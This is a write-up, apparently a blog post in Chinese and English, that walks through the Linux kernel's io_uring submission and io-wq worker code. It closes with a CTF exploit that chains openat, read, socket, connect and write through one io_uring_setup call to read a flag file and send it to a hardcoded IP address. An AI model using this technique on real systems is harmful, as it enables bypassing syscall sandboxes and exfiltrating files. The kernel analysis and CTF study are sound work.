entries = smp_load_acquire(&rings->sq.tail) - ctx->cached_sq_head;
return min(entries, ctx->sq_entries);
}

io_submit_sqes

最后是真正的提交请求函数

计算需要提交的sqes并跟踪状态

int io_submit_sqes(struct io_ring_ctx *ctx, unsigned int nr)
__must_hold(&ctx->uring_lock)
{
unsigned int entries = io_sqring_entries(ctx);
unsigned int left;
int ret;

if (unlikely(!entries))
return 0;
/* make sure SQ entry isn't read before tail */
ret = left = min(nr, entries);
io_get_task_refs(left);
io_submit_state_start(&ctx->submit_state, left);

循环处理每个sqes

do {
const struct io_uring_sqe *sqe;
struct io_kiocb *req;

if (unlikely(!io_alloc_req(ctx, &req)))
break;
if (unlikely(!io_get_sqe(ctx, &sqe))) {
io_req_add_to_cache(req, ctx);
break;
}
// 为每个SQE分配并初始化io_kiocb请求
if (unlikely(io_submit_sqe(ctx, req, sqe)) &&
// 真正的提交
!(ctx->flags & IORING_SETUP_SUBMIT_ALL)) {
left--;
break;
}
} while (--left);

io_submit_sqe

这个函数比较关键的是对于同步的处理。我们知道,io_uring 是异步的,任务处理的顺序不一定是按照提交的顺序;但是,如果 sqe 的 flags 字段设置了 IOSQE_IO_LINK,那么任务就会挂到一条链上,直到遇到一个没有此 flag 的任务为止,而链上的任务是按先后顺序执行的。

同时要理解,ctx->submit_state.link 维护的是一条由 io_kiocb 组成的链表,每个 io_kiocb 的 link 成员指向下一个 io_kiocb 结构。
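从用户态的角度,用 liburing 写一个简单的链式提交示意如下(假设 ring 已初始化、fd 已打开、buf 为可写缓冲区,省略了 get_sqe 失败的检查):

#include <liburing.h>

/* 把 read 和 write 串成一条链, 一次 submit, 内核按链序执行 */
static int submit_linked_rw(struct io_uring *ring, int fd, char *buf, unsigned len)
{
	struct io_uring_sqe *sqe;

	sqe = io_uring_get_sqe(ring);
	io_uring_prep_read(sqe, fd, buf, len, 0);
	sqe->flags |= IOSQE_IO_LINK;            /* 本请求完成后才会执行链上的下一个 */

	sqe = io_uring_get_sqe(ring);
	io_uring_prep_write(sqe, 1, buf, len, 0);
	/* 链上最后一个请求不再设置 IOSQE_IO_LINK */

	return io_uring_submit(ring);
}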

static inline int io_submit_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req, const struct io_uring_sqe *sqe)
__must_hold(&ctx->uring_lock)
{
struct io_submit_link *link = &ctx->submit_state.link;
int ret;

ret = io_init_req(ctx, req, sqe);
// 初始化并校验SQE请求req
if (unlikely(ret))
return io_submit_fail_init(sqe, req, ret);
// 如果已有链头或者SQE标记了链接标志

trace_io_uring_submit_req(req);

/*
* If we already have a head request, queue this one for async
* submittal once the head completes. If we don't have a head but
* IOSQE_IO_LINK is set in the sqe, start a new head. This one will be
* submitted sync once the chain is complete. If none of those
* conditions are true (normal request), then just queue it.
*/
if (unlikely(link->head)) {
// 如果链表已经有了一个head 请求, 意味着之前sqe 有 `IOSQE_IO_LINK` 标志
ret = io_req_prep_async(req);
// 准备异步提交状态
if (unlikely(ret))
return io_submit_fail_init(sqe, req, ret);

trace_io_uring_link(req, link->head);
link->last->link = req;
link->last = req;
// 将本项挂载到链表

if (req->flags & IO_REQ_LINK_FLAGS)
return 0;
// 如果此项没有 LINK 标志, 清空 链表
/* last request of the link, flush it */
req = link->head;
link->head = NULL;

if (req->flags & (REQ_F_FORCE_ASYNC | REQ_F_FAIL))
goto fallback;

} else if (unlikely(req->flags & (IO_REQ_LINK_FLAGS |
REQ_F_FORCE_ASYNC | REQ_F_FAIL))) {
// 如果之前的任务没有LINK 标记, 但此任务有, 给链表添加一个头
if (req->flags & IO_REQ_LINK_FLAGS) {
link->head = req;
link->last = req;
} else {
fallback:
// 加入降级提交fallback队列
io_queue_sqe_fallback(req);
}
return 0;
}
// 加入普通提交队列
io_queue_sqe(req);
return 0;
}

io_queue_sqe | io_issue_sqe | 重要

static inline void io_queue_sqe(struct io_kiocb *req)
__must_hold(&req->ctx->uring_lock)
{
int ret;

ret = io_issue_sqe(req, IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER);

/*
* We async punt it if the file wasn't marked NOWAIT, or if the file
* doesn't support non-blocking read/write attempts
*/
if (likely(!ret))
io_arm_ltimeout(req);
else
io_queue_async(req, ret);
}
static int io_issue_sqe(struct io_kiocb *req, unsigned int issue_flags)
{
const struct io_issue_def *def = &io_issue_defs[req->opcode];
// 根据op_code 查看请求def
const struct cred *creds = NULL;
int ret;

if (unlikely(!io_assign_file(req, def, issue_flags)))
return -EBADF;
// 为请求分配文件描述符
if (unlikely((req->flags & REQ_F_CREDS) && req->creds != current_cred()))
creds = override_creds(req->creds);
// 备份和恢复请求执行线程的安全凭证
if (!def->audit_skip)
audit_uring_entry(req->opcode);
// 调用audit跟踪提交事件

ret = def->issue(req, issue_flags);
// 调用def->issue执行请求

if (!def->audit_skip)
audit_uring_exit(!ret, ret);


if (creds)
revert_creds(creds);
// 恢复凭证
if (ret == IOU_OK) {
if (issue_flags & IO_URING_F_COMPLETE_DEFER)
// 如果成功并且标记了延迟完成,注册延迟完成回调
io_req_complete_defer(req);
else
io_req_complete_post(req, issue_flags);
// 否则直接提交完成
} else if (ret != IOU_ISSUE_SKIP_COMPLETE)
return ret;

/* If the op doesn't have a file, we're not polling for it */
if ((req->ctx->flags & IORING_SETUP_IOPOLL) && def->iopoll_queue)
io_iopoll_req_issued(req, issue_flags);

return 0;
}

io_get_sqe | 重要

static bool io_get_sqe(struct io_ring_ctx *ctx, const struct io_uring_sqe **sqe)
{
unsigned mask = ctx->sq_entries - 1;
unsigned head = ctx->cached_sq_head++ & mask;

if (!(ctx->flags & IORING_SETUP_NO_SQARRAY)) {
head = READ_ONCE(ctx->sq_array[head]);
// 如果没有设置NOSQARRAY 直接从array读
if (unlikely(head >= ctx->sq_entries)) {
// 丢弃无效 entries
spin_lock(&ctx->completion_lock);
ctx->cq_extra--;
spin_unlock(&ctx->completion_lock);
WRITE_ONCE(ctx->rings->sq_dropped,
READ_ONCE(ctx->rings->sq_dropped) + 1);
return false;
}
}

if (ctx->flags & IORING_SETUP_SQE128)
head <<= 1;
*sqe = &ctx->sq_sqes[head];
// 从 sq_sqes 取一个sqe
return true;
}

io_submit_sqe | 同步与异步的请求执行

我们首先回到 io_submit_sqe

我们注意到, 如果存在 LINK 标记, 只是将这个req添加到链上, 而没有 io_queue_sqe.

如果前一个请求有 LINK 标记,而当前这个没有,那么会先把它挂到链上,然后把 req 置为链表头并清空 link->head,最后对链表头调用 io_queue_sqe。

综上,对于链上的中间请求,提交时并没有被直接处理。

	if (unlikely(link->head)) {
// 如果链表已经有了一个head 请求, 意味着之前sqe 有 `IOSQE_IO_LINK` 标志
ret = io_req_prep_async(req);
// 准备异步提交状态
if (unlikely(ret))
return io_submit_fail_init(sqe, req, ret);

trace_io_uring_link(req, link->head);
link->last->link = req;
link->last = req;
// 将本项挂载到链表

if (req->flags & IO_REQ_LINK_FLAGS)
return 0;
// 如果此项没有 LINK 标志, 清空 链表
/* last request of the link, flush it */
req = link->head;
link->head = NULL;

if (req->flags & (REQ_F_FORCE_ASYNC | REQ_F_FAIL))
goto fallback;

} else if (unlikely(req->flags & (IO_REQ_LINK_FLAGS |
REQ_F_FORCE_ASYNC | REQ_F_FAIL))) {
// 如果之前的任务没有LINK 标记, 但此任务有, 给链表添加一个头
if (req->flags & IO_REQ_LINK_FLAGS) {
link->head = req;
link->last = req;
} else {
fallback:
// 加入降级提交fallback队列
io_queue_sqe_fallback(req);
}
return 0;
}
// 加入普通提交队列
io_queue_sqe(req);

Returning once more to io_queue_sqe, we see that it calls io_issue_sqe with two flags set, IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER, which literally mean non-blocking and deferred completion.

First, why non-blocking?

Recall that, even in IOPOLL mode, io_uring_enter calls io_submit_sqes and eventually reaches this function. If this function blocked, the user process would effectively block as well, which defeats the whole point of asynchronous I/O.

static inline void io_queue_sqe(struct io_kiocb *req)
__must_hold(&req->ctx->uring_lock)
{
int ret;

ret = io_issue_sqe(req, IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER);

/*
* We async punt it if the file wasn't marked NOWAIT, or if the file
* doesn't support non-blocking read/write attempts
*/
if (likely(!ret))
io_arm_ltimeout(req);
else
io_queue_async(req, ret);
}

Next we step into io_issue_sqe, which dispatches to the opcode's handler through a table of function pointers (io_issue_defs), passing the flags from above along as a parameter.

As we know, many operations such as read and write can block and cannot run in non-blocking mode, so this call is only an attempted execution; it does not necessarily complete the request.

ret = def->issue(req, issue_flags);
// dispatch the request through def->issue
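For reference, each opcode's entry in that table bundles the opcode's properties with its prep and issue handlers. The IORING_OP_READ entry looks roughly like this (paraphrased from io_uring/opdef.c; the exact set of fields and helper names varies between kernel versions):

/* io_uring/opdef.c — IORING_OP_READ entry, paraphrased */
[IORING_OP_READ] = {
    .needs_file   = 1,
    .pollin       = 1,       /* may be retried via poll instead of blocking */
    .audit_skip   = 1,
    .iopoll       = 1,
    .iopoll_queue = 1,
    .prep         = ...,     /* per-opcode prepare callback */
    .issue        = io_read, /* what def->issue dispatches to above */
},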

Next, note that when io_queue_sqe calls this function, the IO_URING_F_COMPLETE_DEFER flag is set.

if (ret == IOU_OK) {
if (issue_flags & IO_URING_F_COMPLETE_DEFER)
// on success with deferred completion requested, defer the completion
io_req_complete_defer(req);
else
io_req_complete_post(req, issue_flags);
// otherwise post the completion immediately
} else if (ret != IOU_ISSUE_SKIP_COMPLETE)
return ret;

Stepping into io_req_complete_defer, we find that it merely appends the request to the deferred-completion list.

static inline void io_req_complete_defer(struct io_kiocb *req)
__must_hold(&req->ctx->uring_lock)
{
struct io_submit_state *state = &req->ctx->submit_state;

lockdep_assert_held(&req->ctx->uring_lock);

wq_list_add_tail(&req->comp_list, &state->compl_reqs);
}

This still does not complete the request.

So where is the request actually completed? Let us keep digging.

io_queue_async

When io_issue_sqe returns unsuccessfully, io_queue_sqe goes on to call this function.

static void io_queue_async(struct io_kiocb *req, int ret)
__must_hold(&req->ctx->uring_lock)
{
struct io_kiocb *linked_timeout;

if (ret != -EAGAIN || (req->flags & REQ_F_NOWAIT)) {
io_req_defer_failed(req, ret);
return;
} // if the error is not -EAGAIN, or the request must not wait, it cannot be punted: fail it

linked_timeout = io_prep_linked_timeout(req);

switch (io_arm_poll_handler(req, 0)) {
// arm a poll handler to decide how the request should proceed
case IO_APOLL_READY:
// already ready: queue it to be executed as task work
io_kbuf_recycle(req, 0);
io_req_task_queue(req);
break;
case IO_APOLL_ABORTED:
// polling could not be armed / was aborted: punt to the io-wq thread pool
io_kbuf_recycle(req, 0);
io_queue_iowq(req, NULL);
break;
case IO_APOLL_OK:
// poll armed successfully; the request will be retried when it fires
break;
}

if (linked_timeout)
io_queue_linked_timeout(linked_timeout);
}

Note that in the IO_APOLL_ABORTED case, io_queue_iowq is called.

A quick introduction to the io-wq work-queue mechanism first: io-wq is a kernel thread pool; when a piece of work arrives, a thread is picked from the pool to run it. What happens here is simply placing the request onto that pool's work queue.

A reader might ask: when is this thread pool created? It happens during the ctx creation process that I skipped earlier. // #TODO: it is rather involved and I have not analyzed it yet.

io_queue_iowq | the work-processing thread pool

This part is also important. First, io_prep_async_link(req) initializes the work structure of every request on the link chain so it can be queued; the request is then added to the thread pool's queue via io_wq_enqueue.

void io_queue_iowq(struct io_kiocb *req, struct io_tw_state *ts_dont_use)
{
struct io_kiocb *link = io_prep_linked_timeout(req);
struct io_uring_task *tctx = req->task->io_uring;

BUG_ON(!tctx);
BUG_ON(!tctx->io_wq);

/* init ->work of the whole link before punting */
io_prep_async_link(req);
// prepare the ->work of every req on the link chain
/*
* Not expected to happen, but if we do have a bug where this _can_
* happen, catch it here and ensure the request is marked as
* canceled. That will make io-wq go through the usual work cancel
* procedure rather than attempt to run this request (or create a new
* worker for it).
*/
if (WARN_ON_ONCE(!same_thread_group(req->task, current)))
req->work.flags |= IO_WQ_WORK_CANCEL;

trace_io_uring_queue_async_work(req, io_wq_is_hashed(&req->work));
io_wq_enqueue(tctx->io_wq, &req->work);
if (link)
io_queue_linked_timeout(link);
}

Why queue the work structure rather than the io_kiocb itself? work is a member embedded in io_kiocb, so the io_kiocb pointer can be recovered from the work pointer by subtracting the member's offset (the classic container_of trick, illustrated below); at the same time, because work is much smaller, the bookkeeping built around queued items stays compact.
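A minimal user-space illustration of that pointer trick (not kernel code; demo_req and demo_work are made-up stand-ins for io_kiocb and io_wq_work):

#include <stddef.h>
#include <stdio.h>

/* container_of: recover a pointer to the enclosing struct from a pointer
 * to one of its members, by subtracting the member's offset. */
#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

struct demo_work { int flags; };                          /* io_wq_work-ish */
struct demo_req  { int opcode; struct demo_work work; };  /* io_kiocb-ish   */

int main(void)
{
    struct demo_req req = { .opcode = 22 };
    struct demo_work *w = &req.work;     /* only the small member is queued */

    /* later, the worker recovers the full request from the member pointer */
    struct demo_req *r = container_of(w, struct demo_req, work);
    printf("opcode = %d\n", r->opcode);  /* prints 22 */
    return 0;
}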

io_wq_enqueue

io_wq_enqueue places the work item onto the io_wq thread pool's work queue.

void io_wq_enqueue(struct io_wq *wq, struct io_wq_work *work)
{
struct io_wq_acct *acct = io_work_get_acct(wq, work);
struct io_cb_cancel_data match;
unsigned work_flags = work->flags;
bool do_create;

/*
* If io-wq is exiting for this task, or if the request has explicitly
* been marked as one that should not get executed, cancel it here.
*/
if (test_bit(IO_WQ_BIT_EXIT, &wq->state) ||
(work->flags & IO_WQ_WORK_CANCEL)) {
io_run_cancel(work, wq);
return;
}
// the block above handles work that has to be cancelled
raw_spin_lock(&acct->lock);
io_wq_insert_work(wq, work);
clear_bit(IO_ACCT_STALLED_BIT, &acct->flags);
raw_spin_unlock(&acct->lock);

rcu_read_lock();
do_create = !io_wq_activate_free_worker(wq, acct);
rcu_read_unlock();
// decide whether a new worker must be created
if (do_create && ((work_flags & IO_WQ_WORK_CONCURRENT) ||
!atomic_read(&acct->nr_running))) {
bool did_create;

did_create = io_wq_create_worker(wq, acct);
// create a worker
if (likely(did_create))
return;
// if the worker was created, we are done
raw_spin_lock(&wq->lock);
if (acct->nr_workers) {
raw_spin_unlock(&wq->lock);
return;
}
raw_spin_unlock(&wq->lock);

/* fatal condition, failed to create the first worker */
match.fn = io_wq_work_match_item,
match.data = work,
match.cancel_all = false,

io_acct_cancel_pending_work(wq, acct, &match);
}
}

This in turn calls io_wq_create_worker:

static bool io_wq_create_worker(struct io_wq *wq, struct io_wq_acct *acct)
{
if (unlikely(!acct->max_workers))
pr_warn_once("io-wq is not configured for unbound workers");

raw_spin_lock(&wq->lock);
if (acct->nr_workers >= acct->max_workers) {
raw_spin_unlock(&wq->lock);
return true;
}
// already at the worker limit,
// so just return

acct->nr_workers++;
raw_spin_unlock(&wq->lock);
atomic_inc(&acct->nr_running);
atomic_inc(&wq->worker_refs);
return create_io_worker(wq, acct->index);
// spawn a new worker
}

create_io_worker | creating a worker thread

static bool create_io_worker(struct io_wq *wq, int index)
{
struct io_wq_acct *acct = &wq->acct[index];
struct io_worker *worker;
struct task_struct *tsk;

__set_current_state(TASK_RUNNING);

worker = kzalloc(sizeof(*worker), GFP_KERNEL);
// allocate the io_worker structure
if (!worker) {
fail:
atomic_dec(&acct->nr_running);
raw_spin_lock(&wq->lock);
acct->nr_workers--;
raw_spin_unlock(&wq->lock);
io_worker_ref_put(wq);
return false;
}

refcount_set(&worker->ref, 1);
worker->wq = wq;
raw_spin_lock_init(&worker->lock);
init_completion(&worker->ref_done);

if (index == IO_WQ_ACCT_BOUND)
worker->flags |= IO_WORKER_F_BOUND;

tsk = create_io_thread(io_wq_worker, worker, NUMA_NO_NODE);
// create the worker kernel thread
if (!IS_ERR(tsk)) {
io_init_new_worker(wq, worker, tsk);
} else if (!io_should_retry_thread(PTR_ERR(tsk))) {
kfree(worker);
goto fail;
} else {
INIT_WORK(&worker->work, io_workqueue_create);
schedule_work(&worker->work);
}

return true;
}

io_wq_worker | the kernel worker thread

This thread is the basic worker unit of the pool and the thread that actually performs the asynchronous I/O. It sleeps (TASK_INTERRUPTIBLE plus schedule_timeout) until there is work to run.

A large part of the middle of the function deals with scheduling details, such as signal handling; since that is not the focus of this analysis, I will skip over it here.

In the end, io_worker_handle_work is called to process the work.

static int io_wq_worker(void *data)
{
struct io_worker *worker = data;
struct io_wq_acct *acct = io_wq_get_acct(worker);
struct io_wq *wq = worker->wq;
bool exit_mask = false, last_timeout = false;
char buf[TASK_COMM_LEN];

worker->flags |= (IO_WORKER_F_UP | IO_WORKER_F_RUNNING);

snprintf(buf, sizeof(buf), "iou-wrk-%d", wq->task->pid);
set_task_comm(current, buf);

while (!test_bit(IO_WQ_BIT_EXIT, &wq->state)) {
long ret;

set_current_state(TASK_INTERRUPTIBLE);

while (io_acct_run_queue(acct))
io_worker_handle_work(acct, worker);
// loop while there is pending work;
// if work is pending, io_acct_run_queue returns true
// with acct->lock held
raw_spin_lock(&wq->lock);
/*
* Last sleep timed out. Exit if we're not the last worker,
* or if someone modified our affinity.
*/
if (last_timeout && (exit_mask || acct->nr_workers > 1)) {
acct->nr_workers--;
raw_spin_unlock(&wq->lock);
__set_current_state(TASK_RUNNING);
break;
}
last_timeout = false;
__io_worker_idle(wq, worker);
//
raw_spin_unlock(&wq->lock);
if (io_run_task_work())
continue;
ret = schedule_timeout(WORKER_IDLE_TIMEOUT);
if (signal_pending(current)) {
struct ksignal ksig;

if (!get_signal(&ksig))
continue;
break;
}
if (!ret) {
last_timeout = true;
exit_mask = !cpumask_test_cpu(raw_smp_processor_id(),
wq->cpu_mask);
}
}

if (test_bit(IO_WQ_BIT_EXIT, &wq->state) && io_acct_run_queue(acct))
io_worker_handle_work(acct, worker);
// io_worker_handle_work must be called with acct->lock held

io_worker_exit(worker);
return 0;
}

io_worker_handle_work

This function must be entered with acct->lock held, and this is where the work actually starts being processed.

static void io_worker_handle_work(struct io_wq_acct *acct,
struct io_worker *worker)
__releases(&acct->lock)
{
struct io_wq *wq = worker->wq;
bool do_kill = test_bit(IO_WQ_BIT_EXIT, &wq->state);

do {
struct io_wq_work *work;

/*
* If we got some work, mark us as busy. If we didn't, but
* the list isn't empty, it means we stalled on hashed work.
* Mark us stalled so we don't keep looking for work when we
* can't make progress, any work completion or insertion will
* clear the stalled flag.
*/
work = io_get_next_work(acct, worker);
raw_spin_unlock(&acct->lock);
if (work) {
__io_worker_busy(wq, worker);

/*
* Make sure cancelation can find this, even before
* it becomes the active work. That avoids a window
* where the work has been removed from our general
* work list, but isn't yet discoverable as the
* current work item for this worker.
*/
raw_spin_lock(&worker->lock);
worker->next_work = work;
raw_spin_unlock(&worker->lock);
} else {
break;
}
io_assign_current_work(worker, work);
__set_current_state(TASK_RUNNING);

// process the whole chain of linked work items
do {
struct io_wq_work *next_hashed, *linked;
unsigned int hash = io_get_work_hash(work);

next_hashed = wq_next_work(work);
// fetch the next work item

if (unlikely(do_kill) && (work->flags & IO_WQ_WORK_UNBOUND))
work->flags |= IO_WQ_WORK_CANCEL;
wq->do_work(work);
// do_work actually runs the request
io_assign_current_work(worker, NULL);

linked = wq->free_work(work);
// release this work and get back any linked work
work = next_hashed;
// move on to the next work item
if (!work && linked && !io_wq_is_hashed(linked)) {
work = linked;
linked = NULL;
}
io_assign_current_work(worker, work);
if (linked)
io_wq_enqueue(wq, linked);

if (hash != -1U && !next_hashed) {
/* serialize hash clear with wake_up() */
spin_lock_irq(&wq->hash->wait.lock);
clear_bit(hash, &wq->hash->map);
clear_bit(IO_ACCT_STALLED_BIT, &acct->flags);
spin_unlock_irq(&wq->hash->wait.lock);
if (wq_has_sleeper(&wq->hash->wait))
wake_up(&wq->hash->wait);
}
} while (work);
// keep looping until the chain is drained
if (!__io_acct_run_queue(acct))
break;
raw_spin_lock(&acct->lock);
} while (1);
}

Note that do_work is invoked here to process the work item. do_work actually points to io_wq_submit_work, which in the end still calls io_issue_sqe to execute the request.
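Where does do_work get that value? As far as I can tell, the callbacks are wired up when the io-wq pool is created for the task, in io_init_wq_offload() (io_uring/tctx.c); a paraphrased excerpt:

/* io_uring/tctx.c, io_init_wq_offload() — paraphrased from my reading */
data.hash = hash;
data.task = task;
data.free_work = io_wq_free_work;
data.do_work = io_wq_submit_work;   /* <-- the do_work used above */

/* Do QD, or 4 * CPUS, whatever is smallest */
concurrency = min(ctx->sq_entries, 4 * num_online_cpus());

return io_wq_create(concurrency, &data);

With that in mind, here is io_wq_submit_work: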

void io_wq_submit_work(struct io_wq_work *work)
{
struct io_kiocb *req = container_of(work, struct io_kiocb, work);
// recover the req pointer from the embedded work member (container_of)
const struct io_issue_def *def = &io_issue_defs[req->opcode];
unsigned int issue_flags = IO_URING_F_UNLOCKED | IO_URING_F_IOWQ;
bool needs_poll = false;
int ret = 0, err = -ECANCELED;

/* one will be dropped by ->io_wq_free_work() after returning to io-wq */
if (!(req->flags & REQ_F_REFCOUNT))
__io_req_set_refcount(req, 2);
else
req_ref_get(req);

io_arm_ltimeout(req);

/* either cancelled or io-wq is dying, so don't touch tctx->iowq */
if (work->flags & IO_WQ_WORK_CANCEL) {
fail:
io_req_task_queue_fail(req, err);
return;
}
if (!io_assign_file(req, def, issue_flags)) {
err = -EBADF;
work->flags |= IO_WQ_WORK_CANCEL;
goto fail;
}

if (req->flags & REQ_F_FORCE_ASYNC) {
bool opcode_poll = def->pollin || def->pollout;

if (opcode_poll && file_can_poll(req->file)) {
needs_poll = true;
issue_flags |= IO_URING_F_NONBLOCK;
}
}

do {
ret = io_issue_sqe(req, issue_flags);
// ultimately io_issue_sqe is what executes the request
if (ret != -EAGAIN)
break;

/*
* If REQ_F_NOWAIT is set, then don't wait or retry with
* poll. -EAGAIN is final for that case.
*/
if (req->flags & REQ_F_NOWAIT)
break;

/*
* We can get EAGAIN for iopolled IO even though we're
* forcing a sync submission from here, since we can't
* wait for request slots on the block side.
*/
if (!needs_poll) {
if (!(req->ctx->flags & IORING_SETUP_IOPOLL))
break;
if (io_wq_worker_stopped())
break;
cond_resched();
continue;
}

if (io_arm_poll_handler(req, issue_flags) == IO_APOLL_OK)
return;
/* aborted or ready, in either case retry blocking */
needs_poll = false;
issue_flags &= ~IO_URING_F_NONBLOCK;
} while (1);

/* avoid locking problems by failing it from a clean context */
if (ret < 0)
io_req_task_queue_fail(req, ret);
}

summary

We have now looked through the whole io_uring implementation from top to bottom.

Of course, this article still leaves many questions open, for example the kernel's implementation of the synchronous and asynchronous paths; my analysis of the kernel-side code is admittedly still somewhat shallow.

As far as this article is concerned, though, the user-space usage of io_uring should now be quite clear.

Finally, let us come back to the question posed at the beginning of the article:

How do we achieve ORW with only a single io_uring_setup system call?

After reading the whole article, you should have the answer:

  • Set IORING_SETUP_SQPOLL: the kernel SQ-polling thread picks up the SQEs, so no io_uring_enter (io_uring_submit) call is needed to submit them.
  • Set IORING_SETUP_NO_MMAP: the rings and SQEs live in user-supplied memory, so no subsequent mmap of the ring and SQEs is needed.

TODO

  • analysis of ctx initialization
  • analysis of thread scheduling
  • analysis of wq queue processing

exp

While exploiting this in practice I found that, in the qemu environment on my laptop, apparently because there is only one core, once control is handed over to the io_sq_thread the main process is essentially blocked until that thread voluntarily yields. As a result, the SQ (including the openat) is actually processed before io_uring_setup returns its fd, so the read SQE only works reliably if the flag file's fd is assumed to be 3.

Writing the result back over a socket connection:

// Note: this assumes the liburing headers (for the io_uring structs and flags),
// liburing's internal __do_syscall2 raw-syscall helper (equivalently,
// syscall(__NR_io_uring_setup, ...)), and that the memory at 0xC0D3000 is
// already mapped in the target before the seccomp filter takes effect.
#include <liburing.h>

int main()
{
struct io_uring_params params = {0};
char flag[0x10] = "./flag\x00";
char buff[0x10] = "AAAAAAAA\n";
void *ring_ptr;
unsigned *ktail;
struct
{
__u64 a1;
__u64 a2;
} socket_add = //{0x0100007f5c110002, 0};
{0x017aa8c05c110002,0};
// mmap(0xC0D3000uLL, 0x3000uLL, 7uLL, 34u, 0xFFFFFFFFuLL, 0LL);
params.sq_off.user_addr = 0xC0D3000 + 0x1000;
ring_ptr = params.cq_off.user_addr = 0xC0D3000 + 0x2000;
params.flags = IORING_SETUP_SQPOLL | IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY;

params.sq_thread_idle = 0x2000000;

struct io_uring_sqe *sqe = (struct io_uring_sqe *)(0xC0D3000 + 0x1000);

sqe[0].opcode = IORING_OP_OPENAT;
sqe[0].flags = IOSQE_IO_LINK;
sqe[0].fd = -100;
sqe[0].addr = flag;

sqe[1].opcode = IORING_OP_READ;
sqe[1].flags = IOSQE_IO_LINK;
sqe[1].fd = 3;
sqe[1].addr = buff;
sqe[1].len = 0x100;

sqe[2].opcode = IORING_OP_SOCKET;
sqe[2].flags = IOSQE_IO_LINK;
sqe[2].fd = 2;
sqe[2].off = 1;

sqe[3].opcode = IORING_OP_CONNECT;
sqe[3].flags = IOSQE_IO_LINK;
sqe[3].fd = 5;
sqe[3].flags = 4;
sqe[3].addr = &socket_add;
sqe[3].off = 0x10;

sqe[4].opcode = IORING_OP_WRITE;
sqe[4].fd = 5;
sqe[4].addr = buff;
sqe[4].len = 0x100;
ktail = ring_ptr + 4;
io_uring_smp_store_release(ktail, 5);
__do_syscall2(425, 0x10, &params);

while (1) {};

return 0;
}

orw


sqe[0].opcode = IORING_OP_OPENAT;
sqe[0].flags = IOSQE_IO_HARDLINK;
sqe[0].fd = -100;
sqe[0].addr = flag;

sqe[1].opcode = IORING_OP_READ;
sqe[1].flags = IOSQE_IO_HARDLINK;
sqe[1].fd = 3;
sqe[1].addr = buff;
sqe[1].len = 0x10;

//sqe[4].flags = IOSQE_IO_HARDLINK;

sqe[2].opcode = IORING_OP_WRITE;
sqe[2].fd = 1;
sqe[2].addr = buff;
sqe[2].len = 0x10;

Issuing many openat requests avoids the race between the fds returned by open and the fd returned by io_uring_setup, making the exploit more reliable:

sqe[0].opcode = IORING_OP_OPENAT;
sqe[0].flags = IOSQE_IO_HARDLINK;
sqe[0].fd = -100;
sqe[0].addr = flag;

sqe[1].opcode = IORING_OP_OPENAT;
sqe[1].flags = IOSQE_IO_HARDLINK;
sqe[1].fd = -100;
sqe[1].addr = flag;

sqe[2].opcode = IORING_OP_OPENAT;
sqe[2].flags = IOSQE_IO_HARDLINK;
sqe[2].fd = -100;
sqe[2].addr = flag;

sqe[3].opcode = IORING_OP_OPENAT;
sqe[3].flags = IOSQE_IO_HARDLINK;
sqe[3].fd = -100;
sqe[3].addr = flag;

sqe[4].opcode = IORING_OP_OPENAT;
sqe[4].flags = IOSQE_IO_HARDLINK;
sqe[4].fd = -100;
sqe[4].addr = flag;

sqe[5].opcode = IORING_OP_READ;
sqe[5].flags = IOSQE_IO_HARDLINK;
sqe[5].fd = 6;
sqe[5].addr = buff;
sqe[5].len = 0x100;

sqe[6].opcode = IORING_OP_SOCKET;
sqe[6].flags = IOSQE_IO_HARDLINK;
sqe[6].fd = 2;
sqe[6].off = 1;

sqe[7].opcode = IORING_OP_CONNECT;
sqe[7].flags = IOSQE_IO_HARDLINK;
sqe[7].fd = 9;
sqe[7].flags = 4;
sqe[7].addr = &socket_add;
sqe[7].off = 0x10;

sqe[8].opcode = IORING_OP_WRITE;
sqe[8].fd = 9;
sqe[8].addr = buff;
sqe[8].len = 0x100;
int main()
{
struct io_uring_params params = {0};
char flag[0x10] = "./flag\x00";
char buff[0x10] = "AAAAAAAA\n";
void *ring_ptr;
unsigned *ktail;
struct
{
__u64 a1;
__u64 a2;
} socket_add = //{0x0100007f5c110002, 0};
{0x017aa8c05c110002,0};
//mmap(0xC0D3000uLL, 0x3000uLL, 7uLL, 34u, 0xFFFFFFFFuLL, 0LL);
params.sq_off.user_addr = 0xC0D3000 + 0x1000;
ring_ptr = params.cq_off.user_addr = 0xC0D3000 + 0x2000;
params.flags = IORING_SETUP_SQPOLL | IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY;

params.sq_thread_idle = 0x2000000;

struct io_uring_sqe *sqe = (struct io_uring_sqe *)(0xC0D3000 + 0x1000);

sqe[0].opcode = IORING_OP_OPENAT;
sqe[0].flags = IOSQE_IO_LINK;
sqe[0].fd = -100;
sqe[0].addr = flag;

sqe[1].opcode = IORING_OP_OPENAT;
sqe[1].flags = IOSQE_IO_LINK;
sqe[1].fd = -100;
sqe[1].addr = flag;

sqe[2].opcode = IORING_OP_OPENAT;
//sqe[2].flags = IOSQE_IO_LINK;
sqe[2].fd = -100;
sqe[2].addr = flag;


sqe[3].opcode = IORING_OP_READ;
//sqe[3].flags = IOSQE_IO_LINK;
sqe[3].fd = 4;
sqe[3].addr = buff;
sqe[3].len = 0x100;

sqe[4].opcode = IORING_OP_WRITE;
//sqe[4].flags = IOSQE_IO_LINK;
sqe[4].fd = 1;
sqe[4].addr = buff;
sqe[4].len = 0x100;


ktail = ring_ptr + 4;
io_uring_smp_store_release(ktail, 5);
__do_syscall2(425, 0x10, &params);

while (1) {};
return 0;
}